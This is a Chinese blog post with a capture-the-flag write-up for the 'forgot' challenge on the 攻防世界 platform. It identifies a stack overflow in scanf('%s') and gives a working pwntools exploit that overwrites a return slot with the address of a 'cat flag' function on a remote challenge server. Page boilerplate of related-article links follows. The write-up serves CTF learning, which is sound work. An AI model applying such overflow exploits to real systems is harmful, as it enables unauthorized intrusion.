攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
坚定信念,勇往无前10 小时前
Alibaba Cloud Linux 4.0安装mongodump
linux·运维·服务器
虹梦未来10 小时前
【运维心得】Ubuntu2404编译nginx隐藏Server信息
运维·服务器·nginx
hello_25010 小时前
排查K8s Pod Core Dump问题
linux·docker·kubernetes
iAkuya10 小时前
(leetcode)力扣100 21搜索二维矩阵2(z型搜索)
linux·leetcode·矩阵
Ghost Face...11 小时前
DQ与DQS的90°相位关系:从原理到图像的完整解析
linux
可爱又迷人的反派角色“yang”11 小时前
docker(三)
linux·运维·网络·docker·容器·云计算
xu_ws11 小时前
Linux CentOS 7.9 MySQL 8.0安装配置全攻略
linux·运维·mysql·centos
starsky_walker11 小时前
【工具教程系列】--如何配置github的ssh
运维·ssh·github
l1t11 小时前
Python 字符串反转方法
linux·开发语言·python
饼饼饼11 小时前
从 0 到 1:前端 CI/CD 实战 ( 第一篇: 云服务器环境搭建)
运维·前端·自动化运维
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03UV安装并设置国内源04Linux下V2Ray安装配置指南05Gemini3 生成的基于手势控制3D粒子圣诞树06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07Labelme从安装到标注:零基础完整指南08解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题09GLM-4.7 vs MiniMax-M2.1:代码工程理解10CentOS的ISO镜像下载